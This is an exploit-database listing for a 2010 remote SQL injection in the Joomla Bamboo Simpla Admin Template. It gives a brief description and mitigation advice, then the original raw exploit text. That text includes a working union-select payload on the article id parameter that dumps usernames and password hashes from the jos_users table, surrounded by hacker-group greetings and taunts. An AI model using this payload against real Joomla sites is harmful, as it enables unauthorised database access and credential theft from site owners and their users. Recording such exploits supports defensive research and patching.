Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection

vendor:

Joomla Bamboo Simpla Admin Template

by:

R3d-D3v!L

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla Bamboo Simpla Admin Template

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection

A remote SQL injection vulnerability exists in Joomla Bamboo Simpla Admin Template. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to the application database and potentially compromise the application and its data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: Joomla Bamboo Simpla Admin Template suffer from REMOTe sql injection
[~] Vendor: .joomlabamboo.com
[?] Software:Joomla Bamboo Simpla Admin Template
[-]
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 09:15 am GMT
[?] Home: WwW.xP10.ME
[?]
[?]
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????


[*] Err0r C0N50L3:


http://server/P47H/index.php?option=com_content&view=article&id= {EV!L EXPLO!T}

[~] {EV!L EXPLO!T}:

-666/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--



N073:

REAL RED DEV!L W@S h3r3 LAMERZ


GAZA !N our hearts !


[~]-----------------------------{((Angela Bennett))}---------------------------------------


[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ

[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4

[?]spechial SupP0RT: MY M!ND ;) & ((OFFsec))

[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t))

[~]spechial FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~]{[(D!R 4ll 0R D!E)]};

[~]---------------------------------------------------------------------------------------------